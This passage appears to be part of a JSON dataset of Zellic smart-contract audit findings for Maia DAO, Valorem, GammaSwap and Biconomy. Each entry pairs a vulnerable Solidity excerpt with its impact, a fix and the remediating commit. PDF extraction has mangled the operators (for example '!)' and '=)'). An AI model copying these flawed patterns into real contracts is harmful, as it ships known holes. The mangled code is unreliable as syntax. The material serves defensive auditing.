(deposits[tokenId].stakedTimestamp !) 0) revert TokenStakedError(); (IUniswapV3Pool pool, int24 tickLower, int24 tickUpper, uint128 liquidity) = NFTPositionInfo.getPositionInfo(factory, nonfungiblePositionManager, tokenId); _stakeToken(tokenId, pool, tickLower, tickUpper, liquidity); } function _stakeToken(uint256 tokenId, IUniswapV3Pool pool, int24 tickLower, int24 tickUpper, uint128 liquidity) private { IncentiveKey memory key = IncentiveKey({ pool: pool, startTime: IncentiveTime.computeStart(block.timestamp) }); bytes32 incentiveId = IncentiveId.compute(key); if (incentives[incentiveId].totalRewardUnclaimed =) 0) revert NonExistentIncentiveError(); if (uint24(tickUpper - tickLower) < poolsMinimumWidth[pool]) revert RangeTooSmallError(); if (liquidity =) 0) revert NoLiquidityError(); stakedIncentiveKey[tokenId] = key; /) If user not attached to gauge, attach address tokenOwner = deposits[tokenId].owner; if (userAttachements[tokenOwner][pool] =) 0) { userAttachements[tokenOwner][pool] = tokenId; gauges[pool].attachUser(tokenOwner); Zellic Maia DAO } deposits[tokenId].stakedTimestamp = uint40(block.timestamp); incentives[incentiveId].numberOfStakes+); (, uint160 secondsPerLiquidityInsideX128, ) = pool.snapshotCumulativesInside( tickLower, tickUpper ); if (liquidity >) type(uint96).max) { _stakes[tokenId][incentiveId] = Stake({ secondsPerLiquidityInsideInitialX128: secondsPerLiquidityInsideX128, liquidityNoOverflow: type(uint96).max, liquidityIfOverflow: liquidity }); } else { Stake storage stake = _stakes[tokenId][incentiveId]; stake.secondsPerLiquidityInsideInitialX128 = secondsPerLiquidityInsideX128; stake.liquidityNoOverflow = uint96(liquidity); } emit TokenStaked(tokenId, incentiveId, liquidity); } The issue is that it does not check that the contract owns the token or that there is a corresponding Deposit for it. This means that the tokenOwner will end up being zero and still attached to the gauge, and the stakes will be updated even though the con- tract has no access to the token. Luckily it is not possible to unstakeToken the token because if there is a bribe depot, then nonfungiblePositionManager.collect is called and will fail, and if not, then key. pool.snapshotCumulativesInside will revert with TLU as both deposit.tickLower and deposit.tickUpper will be zero. /) from UniswapV3Staker.unstakeToken address bribeAddress = bribeDepots[key.pool]; Zellic Maia DAO if (bribeAddress !) address(0)) { (uint256 amount0, uint256 amount1) = nonfungiblePositionManager.collect( INonfungiblePositionManager.CollectParams({ tokenId: tokenId, recipient: bribeAddress, amount0Max: type(uint128).max, amount1Max: type(uint128).max }) ); emit feesCollected(bribeAddress, amount0, amount1); } ...)) (, uint160 secondsPerLiquidityInsideX128, ) = key.pool.snapshotCumulativesInside( deposit.tickLower, deposit.tickUpper ); A user can stake a token that is not owned by the contract, causing an invalid entry in the stakes and address zero to be attached to a gauge. The stakeToken method should ensure that there is a valid deposit for the token and that the contract is the current owner. This issue was fixed by Maia DAO in commit 5352be4. Maia DAO states: Followed recommendations only to verify that deposit.owner is not 0 address. Positions deposited in UniswapV3Staker are supposed to be allowed to be staked by anyone. The goal is to allow an automated system to re-stake any position if desired. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.9 Lack of slippage protection", + "labels": [ + "Zellic" + ], + "body": "Target: TalosBaseStrategy Category: Business Logic Likelihood: Medium Severity: Medium : Medium There is no slippage protection on any of the calls to increase or decrease liquid- ity, allowing for trades to be subject to MEV-style attacks such as front-running and sandwiching. When redeem is called, there is a call to decrease liquidity: (amount0, amount1) = _nonfungiblePositionManager.decreaseLiquidity( INonfungiblePositionManager.DecreaseLiquidityParams({ tokenId: tokenId, liquidity: liquidityToDecrease, amount0Min: 0, amount1Min: 0, deadline: block.timestamp }) ); Since amount0Min and amount1Min are both hardcoded to zero, it does not account for slippage. The values for amount0Min and amount1Min are also hardcoded to zero in the following functions: TalosStrategyVanilla._compoundFees - nonfungiblePositionManager.increaseL iquidity TalosBaseStrategy.init - nonfungiblePositionManager.mint TalosBaseStrategy.deposit - nonfungiblePositionManager.increaseLiquidity TalosBaseStrategy.redeem - nonfungiblePositionManager.decreaseLiquidity TalosBaseStrategy._withdrawAll - nonfungiblePositionManager.decreaseLiquid ity As stated in the Uniswap V3 docs for minting, increasing, and decreasing, \u201cIn produc- tion, amount0Min and amount1Min should be adjusted to create slippage protections.\u201d Zellic Maia DAO We recommend adding user parameters in that allow for the customization of the level of slippage tolerance so that amount0Min and amount1Min can be adjusted ac- cordingly. This issue was fixed by Maia DAO in commit ddcca86. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Potential loss of weekly emissions", + "labels": [ + "Zellic" + ], + "body": "Target: BaseV2Minter Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium When there is a new period, the weekly emissions and growth are calculated and the new tokens are minted. The storage variable weekly then stores the amount of tokens that are able to be claimed with getRewards. function updatePeriod() public returns (uint256) { uint256 _period = activePeriod; if (block.timestamp >) _period + week &) initializer =) address(0)) { _period = (block.timestamp / week) * week; activePeriod = _period; weekly = weeklyEmission(); uint256 _circulatingSupply = circulatingSupply(); uint256 _growth = calculateGrowth(weekly); uint256 _required = _growth + weekly; uint256 share = (_required * daoShare) / base; _required += share; uint256 _balanceOf = underlying.balanceOf(address(this)); if (_balanceOf < _required) { HERMES(underlying).mint(address(this), _required - _balanceOf); } underlying.safeTransfer(address(vault), _growth); if (dao !) address(0)) underlying.safeTransfer(dao, share); emit Mint(msg.sender, weekly, _circulatingSupply, _growth, share); try flywheelGaugeRewards.queueRewardsForCycle() {} catch {} } return _period; Zellic Maia DAO } function getRewards() external returns (uint256 totalQueuedForCycle) { if (address(flywheelGaugeRewards) !) msg.sender) revert NotFlywheelGaugeRewards(); totalQueuedForCycle = weekly; weekly = 0; underlying.safeTransfer(msg.sender, totalQueuedForCycle); } The issue is that there is no guarantee that getRewards will be called by the flywheel gauge rewards contract before a new period has started and updatePeriod is triggered again. This will overwrite the existing weekly variable, and those emissions can no longer be claimed by the contract. The flywheel gauge rewards contract could be unable to claim the correct amount of emissions if getRewards is not called within the period. Instead of assigning the new emissions to weekly, they could be added to it instead, allowing them to be collected even if multiple periods have occurred. This issue was fixed by Maia DAO in commit 70c96f0. Zellic Maia DAO 3.11 Lack of updating the getUserBoost Target: BoostAggregator Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium In the withdrawGaugeBoost function, the decrementAllGaugesBoost function is called before a transfer is made in order to release the required amount of tokens. This is necessary because if the freeGaugeBoost value is less than amount, then the address(h ermesGaugeBoost).safeTransfer(to, amount) call will not be successful. However, it is worth noting that the decrementAllGaugesBoost function only decreases the getUse rGaugeBoost[msg.sender][gauge] value and does not modify the getUserBoost[user] value. function withdrawGaugeBoost(address to, uint256 amount) external onlyOwner { hermesGaugeBoost.decrementAllGaugesBoost(amount); address(hermesGaugeBoost).safeTransfer(to, amount); } function decrementAllGaugesBoost(uint256 boost) external { decrementGaugesBoostIndexed(boost, 0, _userGauges[msg.sender].length()); } function decrementGaugesBoostIndexed( uint256 boost, uint256 offset, uint256 num ) public { address[] memory gaugeList = _userGauges[msg.sender].values(); uint256 length = gaugeList.length; for (uint256 i = 0; i < num &) i < length; ) { address gauge = gaugeList[offset + i]; GaugeState storage gaugeState = getUserGaugeBoost[msg.sender][gauge]; Zellic Maia DAO if (_deprecatedGauges.contains(gauge) |) boost >) gaugeState.userGaugeBoost) { require(_userGauges[msg.sender].remove(gauge)); /) Remove from set. Should never fail. delete getUserGaugeBoost[msg.sender][gauge]; } else { gaugeState.userGaugeBoost -= boost.toUint128(); } unchecked { i+); } } } The withdrawGaugeBoost will be reverted if the current freeGaugeBoost number is less than the amount value despite the decrementAllGaugesBoost function call. function transfer(address to, uint256 amount) public override notAttached(msg.sender, amount) returns (bool) { ...)) } modifier notAttached(address user, uint256 amount) { if (freeGaugeBoost(user) < amount) revert AttachedBoost(); _; } function freeGaugeBoost(address user) public view returns (uint256) { return balanceOf[user] - getUserBoost[user]; } Zellic Maia DAO The function updateUserBoost should be called before the safeTransfer call. This issue was fixed by Maia DAO in commit ab968de. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Erroneous full value reset of _delegatesVotesCount", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Gauges Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The _decrementVotesUntilFree function allows to release the required number of votes for transferring or burning. The amount of released votes is the minimum between the amount of votes assigned by the user to delegatee and number of unused votes of this delegatee. If this value is nonzero, the delegatee will be removed from the _delegate s[user] array and the _delegatesVotesCount[user][delegatee] will be reset to zero. function _decrementVotesUntilFree(address user, uint256 votes) internal { ...)) for (uint256 i = 0; i < size &) (userFreeVotes + totalFreed) < votes; i+)) { ...)) uint256 delegateVotes = _delegatesVotesCount[user][delegatee]; delegateVotes = FixedPointMathLib.min(delegateVotes, userUnusedVotes(delegatee)); if (delegateVotes !) 0) { totalFreed += delegateVotes; require(_delegates[user].remove(delegatee)); _delegatesVotesCount[user][delegatee] = 0; _writeCheckpoint(delegatee, _subtract, delegateVotes); emit Undelegation(user, delegatee, delegateVotes); } } ...)) } The userUnusedVotes(delegatee) function in this contract always returns a value that is equal to or greater than the _delegatesVotesCount[user][delegatee] variable. How- Zellic Maia DAO ever, the ERC20Gauges contract inherits from the ERC20MultiVotes contract and rewrites the userUnusedVotes function. As a result, during the execution of the transfer, transf erFrom, or burn functions, the userUnusedVotes function will return the current amount of unused votes minus the assigned amount of votes as weight, as shown below: function userUnusedVotes(address user) public view override returns (uint256) { return super.userUnusedVotes(user) - getUserWeight[user]; } This means that it is possible for the delegateVotes value to be less than the _delega tesVotesCount[user][delegatee] value, which could cause the values to be reset by mistake. We recommend decreasing the _delegatesVotesCount[user][delegatee] by delegat eVotes value and removing delegatee from the _delegates[user] only if the _delegat esVotesCount[user][delegatee] is equal to the delegateVotes value. This issue was fixed by Maia DAO in commit e7065d7. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Lack of deleting a gauge from the getUserGaugeBoost", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Boost Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The decrementGaugeBoost function allows the caller to remove an amount of boost from a gauge. A gauge is a contract that handles the distribution of rewards to users, attaching/detaching boost and accruing bribes for a strategy. The boost value allows users to increase their rewards. The user controls the gauge address and the boost amount but can only decrease the boost value connected with their address. If the current value of getUserGaugeBoost[msg.sender][gauge] is less than or equal to the value of boost, then the value will be deleted. The issue is that the gauge address should be removed from the _userGauges[msg.sen der] array as well. function decrementGaugeBoost(address gauge, uint256 boost) public { GaugeState storage gaugeState = getUserGaugeBoost[msg.sender][gauge]; if (boost >) gaugeState.userGaugeBoost) { delete getUserGaugeBoost[msg.sender][gauge]; } else { gaugeState.userGaugeBoost -= boost.toUint128(); } } The array _userGauges[msg.sender] will still contain the gauge address, and the userG auges function will mistakenly return this gauge address. Remove the gauge address from _userGauges[msg.sender]. function decrementGaugeBoost(address gauge, uint256 boost) public { Zellic Maia DAO GaugeState storage gaugeState = getUserGaugeBoost[msg.sender][gauge]; if (boost >) gaugeState.userGaugeBoost) { _userGauges[msg.sender].remove(gauge); delete getUserGaugeBoost[msg.sender][gauge]; } else { gaugeState.userGaugeBoost -= boost.toUint128(); } } This issue was fixed by Maia DAO in commit 059904f. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.14 Incorrect initial optimizer ID", + "labels": [ + "Zellic" + ], + "body": "Target: OptimizerFactory Category: Coding Mistakes Likelihood: High Severity: Low : Low When creating a new optimizer with the OptimizerFactory, the assigned ID is equal to the length of the optimizer array: function createTalosOptimizer( uint32 _twapDuration, int24 _maxTwapDeviation, int24 _tickRangeMultiplier, uint24 _pricePercentage, uint256 _maxTotalSupply, address owner ) external { TalosOptimizer optimizer = new TalosOptimizer( _twapDuration, _maxTwapDeviation, _tickRangeMultiplier, _pricePercentage, _maxTotalSupply, owner ); optimizerIds[optimizer] = optimizers.length; optimizers.push(optimizer); } For the first optimizer created, this will be zero as the array has no values. This means that the optimizer will not be able to be used by the TalosBaseStrategyFactory as it has a check to see if the ID of the optimizer is zero: function createTalosBaseStrategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, Zellic Maia DAO bytes memory data ) external { if (optimizerFactory.optimizerIds(TalosOptimizer(address(optimizer))) =) 0) revert UnrecognizedOptimizer(); TalosBaseStrategy strategy = createTalosV3Strategy(pool, optimizer, strategyManager, data); strategyIds[strategy] = strategies.length; strategies.push(strategy); } The first optimizer created by the OptimizerFactory cannot be used by the TalosBase StrategyFactory because the optimizer ID will be zero and cause a revert. The new optimizer should be pushed to the optimizer before the optimizerIds is up- dated so that the first optimizer receives an ID of one. This issue was fixed by Maia DAO in commit 5448551. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Bucket for exercise() manipulatable with small exercise() calls", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: Medium Severity: High : Medium The first bucket to be exercised in an exercise() call is based on a deterministic seed. This seed is reset upon every exercise() call. The seed can be intentionally reset by exercise()ing with a small amount. If the seed is repeatedly reset until the desired bucket is next in line, the next bucket to be exercised can effectively be chosen this way. The code to choose buckets and exercise are as follows: function _assignExercise(OptionTypeState storage optionTypeState, Option storage optionRecord, uint112 amount) private { /) Setup pointers to buckets and buckets with collateral available for exercise. /) ...)) uint96 numUnexercisedBuckets = uint96(unexercisedBucketIndices.length); uint96 exerciseIndex = uint96(optionRecord.settlementSeed % numUnexercisedBuckets); while (amount > 0) { /) ...)) if (amount !) 0) { exerciseIndex = (exerciseIndex + 1) % numUnexercisedBuckets; } } Zellic Valorem Labs Inc /) Update the seed for the next exercise. optionRecord.settlementSeed = uint160(uint256(keccak256(abi.encode(optionRecord.settlementSeed, exerciseIndex)))); } A user who owns options can effectively choose the next bucket to be exercised for that option category. This can be used to reduce the exercise priority of one\u2019s own options or force some specific bucket of options to be preferentially exercised. Reset the settlementSeed only if at least one bucket is exhausted. The settlementSeed is now only randomized for the first bucket. It was fixed in commit 1d6c08b43. Zellic Valorem Labs Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem Options - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Probability of bucket exercise() not correlated with size", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: N/A Severity: Medium : Medium The probability of an options bucket being chosen for exercise() is not correlated with the number of options contained in that bucket. Individual options in smaller buckets have a higher probability of being chosen for exercise. The first bucket to be exercised per exercise() call is chosen pseudorandomly with uniform probability for all buckets as follows: uint96 numUnexercisedBuckets = uint96(unexercisedBucketIndices.length); uint96 exerciseIndex = uint96(optionRecord.settlementSeed % numUnexercisedBuckets); Since the probability of exercise is not normalized by bucket size, options in smaller buckets have a higher expected amount exercised per option. If writing a small amount of options, this can be disadvantageous if unable to write into a larger bucket. Base the probability of a bucket being chosen on the size of the bucket or some other criterion to ensure fairness. Since the commit 1d6c08b43, only the first bucket to be exercised is random. Since the number of randomizations is now vastly reduced, the bias of the uneven ran- domization has been drastically improved. Although the choice of first bucket is still biased. Valorem Labs Inc plans to fully remediate this in a future version. Zellic Valorem Labs Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem Options - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: ExternalLiquidationStrategy.sol Function: _liquidateExternally(uint256 tokenId, uint128[] amounts, uint 256 lpTokens, address to, byte[] data) Allows any caller to liquidate the existing loan using a flash loan of collateral tokens from the pool and/or CFMM LP tokens. Before the liquidation, the externalSwap func- tion will be called. After that, a check will be made that enough tokens have been deposited. Allows only full liquidation of the loan. Inputs", + "labels": [ + "Zellic" + ], + "body": "tokenId \u2013 Validation: There is no verification that the corresponding _loan for this tokenId exists. \u2013 : A tokenId referring to an existing _loan. Not necessary msg.sender is owner of _loan, so the caller can choose any existing loan. amounts \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside externa lSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 : Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside ex ternalSwap->sendCFMMLPTokens->sendToken function \u2013 : Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 : Address that will receive the collateral tokens and/or lpTokens in flash loan. Zellic GammaSwap data \u2013 Validation: No checks. \u2013 : Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) The part of _liquidateExternally tests are skipped. Intended branches \u25a1 Check that loan was fully liquidated Negative behavior 4\u25a1 _loan for tokenId does not exist. \u25a1 Balance of contract not enough to transfer amounts. \u25a1 Balance of contract not enough to transfer lpTokens. \u25a1 Zero to address. 4\u25a1 After externalCall the s.cfmm balance of contract has not returned to the pre- vious value. \u25a1 After externalCall the balance of contract for each tokens has not returned to the previous value. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCo llateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(to kens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> Gamma SwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s.TO KEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTok ens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_T OKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, t o, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s. LP_TOKEN_BALANCE, but they must return the same or a larger amount after Zellic GammaSwap the externalCall function call; it will be checked inside the payLoanAndRef undLiquidator function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> IExternalCall ee(to).externalCall(msg.sender, amounts, lpTokens, data); \u2013 External/Internal? External. \u2013 Argument control? msg.sender, amounts, lpTokens, and data. \u2013 : The reentrancy is not possible because the other important exter- nal functions have lock. If caller does not return enough amount of tokens, the transaction will be reverted. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> updateCollate ral(_loan) -> GammaSwapLibrary.balanceOf(IERC20(tokens[i]), address(this) ); -> address(_token).staticcall(abi.encodeWithSelector(_token.balanceOf. selector, _address)) \u2013 : Return the current token balance of this contract. This balance will be compared with the last tokenBalance[i] value; if the balance was in- creased, the _loan.tokensHeld and s.TOKEN_BALANCE will be increased too. But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. payLoanAndRefundLiquidator(tokenId, tokensHeld, loanLiquidity, 0, true) - > GammaSwapLibrary.safeTransfer(IERC20(s.cfmm), msg.sender, lpRefund); \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : The user should not control the lpRefund value. Transfer the re- maining part of CFMMLPTokens.", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap V1 Core and Implementations (March, 2023) - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: ExternalLongStrategy.sol Function: _rebalanceExternally(uint256 tokenId, uint128[] amounts, uint 256 lpTokens, address to, byte[] data) Allows the loan\u2019s creator to use a flash loan and also rebalance a loan\u2019s collateral. Inputs", + "labels": [ + "Zellic" + ], + "body": "tokenId \u2013 Validation: There is a check inside the _getLoan function that msg.sender is creator of loan. \u2013 : A tokenId refers to an existing _loan, which will be rebalancing. amounts Zellic GammaSwap \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside externa lSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 : Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside ex ternalSwap->sendCFMMLPTokens->sendToken function. \u2013 : Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 : Address that will receive the collateral tokens and/or lpTokens in flash loan. data \u2013 Validation: No checks. \u2013 : Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) Intended branches 4\u25a1 lpTokens !) 0. \u25a1 amounts is not empty. 4\u25a1 amounts is not empty and lpTokens !) 0. 4\u25a1 Withdraw one of the tokens by no more than the available number of tokens. 4\u25a1 Withdraw both tokens by no more than the available number of tokens. 4\u25a1 Deposit one of the tokens. 4\u25a1 Deposit both tokens. 4\u25a1 Deposit one token and withdraw another. Negative behavior 4\u25a1 _loan for tokenId does not exist. \u25a1 msg.sender is not creator of the _loan. \u25a1 Balance of contract is not enough to transfer amounts. \u25a1 Balance of contract is not enough to transfer lpTokens. \u25a1 Zero to address. \u25a1 After externalCall, the s.cfmm balance of the contract has not returned to the previous value. \u25a1 After externalCall, the balance of the contract for each tokens has not returned to the previous value. \u25a1 After externalCall, the balance of the contract for one of tokens has not re- turned to the previous value. Zellic GammaSwap 4\u25a1 Withdraw one of the tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw both tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw one of the tokens and deposit another, and loan is undercollateralized after externalCall. \u25a1 The amounts and tokenId are zero. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCo llateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(to kens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> Gamma SwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s.TO KEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTok ens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_T OKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, t o, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s. LP_TOKEN_BALANCE, but they must return the same or a larger amount after the externalCall function call; it will be checked inside the checkLPTokens function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> IExternalCall ee(to).externalCall(msg.sender, amounts, lpTokens, data); \u2013 External/Internal? External. \u2013 Argument control? msg.sender, amounts, lpTokens, and data. \u2013 : The reentrancy is not possible because the other important exter- nal functions have lock. If caller does not return enough amount of tokens, the transaction will be reverted. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> updateCollate ral(_loan) -> GammaSwapLibrary.balanceOf(IERC20(tokens[i]), address(this) ); -> address(_token).staticcall(abi.encodeWithSelector(_token.balanceOf. selector, _address)) \u2013 External/Internal? External. Zellic GammaSwap \u2013 Argument control? No. \u2013 : Return the current token balance of this contract. This balance will be compared with the last tokenBalance[i] value; if the balance was in- creased, the _loan.tokensHeld and s.TOKEN_BALANCE will be increased too. But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> checkLPTokens (_cfmm, prevLpTokenBalance, lastCFMMInvariant, lastCFMMTotalSupply) -> Ga mmaSwapLibrary.balanceOf(IERC20(_cfmm), address(this)) \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : Return the current _cfmm balance of this contract. This new balance will be compared with the balance before the externalCall function call, and if new value is less, the transaction will be reverted. Also, update the s.LP_TOKEN_BALANCE and s.LP_INVARIANT. Zellic GammaSwap 5 Audit Results At the time of our audit, the code was not deployed to mainnet EVM. During our audit, we discovered one finding that was informational in nature. Gam- maSwap acknowledged the finding and implemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap V1 Core and Implementations (March, 2023) - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Add Length Validation for callData in validateSessionUserO p", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20SessionValidationModule Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational In the validateSessionUserOp function, the length check for op.callData is incomplete, and there may be callData with illegal length. function validateSessionUserOp( UserOperation calldata _op, bytes32 _userOpHash, bytes calldata _sessionKeyData, bytes calldata _sessionKeySignature ) external pure override returns (bool) { ...)) /) working with userOp.callData /) check if the call is to the allowed recepient and amount is not more than allowed bytes calldata data; { uint256 offset = uint256(bytes32(_op.callData[4 + 64:4 + 96])); uint256 length = uint256( bytes32(_op.callData[4 + offset:4 + offset + 32]) ); /)we expect data to be the `IERC20.transfer(address, uint256)` calldata } data = _op.callData[4 + offset + 32:4 + offset + 32 + length]; if (address(bytes20(data[16:36])) !) recipient) { revert(\u201dERC20SV Wrong Recipient\u201d); Zellic Biconomy Labs } if (uint256(bytes32(data[36:68])) > maxAmount) { revert(\u201dERC20SV Max Amount Exceeded\u201d); } return ECDSA.recover( ECDSA.toEthSignedMessageHash(_userOpHash), _sessionKeySignature ) =) sessionKey; } Data without length restrictions may lead to issues such as hash collisions. A hash collision may lead to the ability to arbitrarily forge user messages. Use abi.decode to get the message length and add a maximum length check on op.c allData. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 3bf128e9. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing element count check of sessionData in validateUse rOp", + "labels": [ + "Zellic" + ], + "body": "Target: BatchedSessionRouter Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The function validateUserOp decodes an array named sessionData and iterates over it to perform various validations and computations. However, there is no explicit check in the code to ensure that the sessionData array contains at least one element. uint256 length = sessionData.length; ( address sessionKeyManager, SessionData[] memory sessionData, bytes memory sessionKeySignature ) = abi.decode(moduleSignature, (address, SessionData[], bytes)); ...)) uint256 length = sessionData.length; /) iterate over batched operations for (uint i; i < length; ) { ...)) } return ( _packValidationData( false, /) sig validation failed = false; if we are here, it is valid ) ); earliestValidUntil, latestValidAfter Zellic Biconomy Labs The absence of a check for the array length could lead to potential logical errors or undesired behaviors in the case where the sessionData array is empty. Implement the array length check and make sure the length of sessionData is equal to the length of destinations. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 3bf128e9. Zellic Biconomy Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing test suite code coverage", + "labels": [ + "Zellic" + ], + "body": "Target: BatchedSessionRouter, ERC20SessionValidationModule, SessionKey- ManagerModule Category: Code Maturity Likelihood: Low Severity: Low : Low In our assessment of Biconomy Batched Session Router Module\u2019s test suite, we ob- served that while it provides adequate coverage for many aspects of the codebase, there are specific branches and codepaths that appear to be under-tested or not cov- ered at all. Some functions in the smart contract are not covered by any unit or integration tests, to the best of our knowledge. The following functions do not have full test coverage: BatchedSessionRouter.sol: validateUserOp. ERC20SessionValidationModule.sol: validateSessionParams. SessionKeyManagerModule.sol: validateSessionKey. Because correctness is so critical when developing smart contracts, we always rec- ommend that projects strive for 100% code coverage. Testing is an essential part of the software development life cycle. No matter how simple a function may be, untested code is always prone to bugs. Expand the test suite so that all functions are covered by unit or integration tests. This issue has been acknowledged by Biconomy Labs, and a fix was implemented in commit 12037aff. Zellic Biconomy Labs 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the modules and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: BatchedSessionRouterModule.sol Function: validateUserOp(UserOperation userOp, byte[32] userOpHash) Validates userOperation. Inputs", + "labels": [ + "Zellic" + ], + "body": "userOp \u2013 Control: Full. \u2013 Constraints: Needs to contain valid selector. \u2013 : User Operation to be validated. If invalid, the function will revert or return a failure code. userOpHash \u2013 Control: Full. \u2013 Constraints: Must be a valid 32-byte\u2013hash representation of the corre- sponding userOp. \u2013 : Hash of the User Operation to be validated. Acts as a unique iden- tifier or checksum of the User Operation. Branches and code coverage (including function calls) Intended branches Function returns SIG_VALIDATION_SUCCESS for a valid UserOp and valid userOpHash. 4\u25a1 Test coverage Function returns SIG_VALIDATION_FAILED if the userOp was signed with an im- proper session key. 4\u25a1 Test coverage Negative behavior Zellic Biconomy Labs Function reverts when userOp.sender is an unregistered smart contract. 4\u25a1 Negative test Function reverts when the length of user.signature is less than 65. 4\u25a1 Negative test", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Batched Session Router Module - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: ERC20SessionValidationModule.sol Function: validateSessionParams(address destinationContract, uint256 ca llValue, byte[] _funcCallData, byte[] _sessionKeyData, byte[] None) This validates that the call (destinationContract, callValue, and funcCallData) com- plies with the Session Key permissions represented by sessionKeyData. Inputs", + "labels": [ + "Zellic" + ], + "body": "destinationContract \u2013 Control: Full. \u2013 Constraints: Must match the token address specified in _sessionKeyData. \u2013 : The address of the contract to be called. callValue \u2013 Control: Full. \u2013 Constraints: Must be zero in value, as 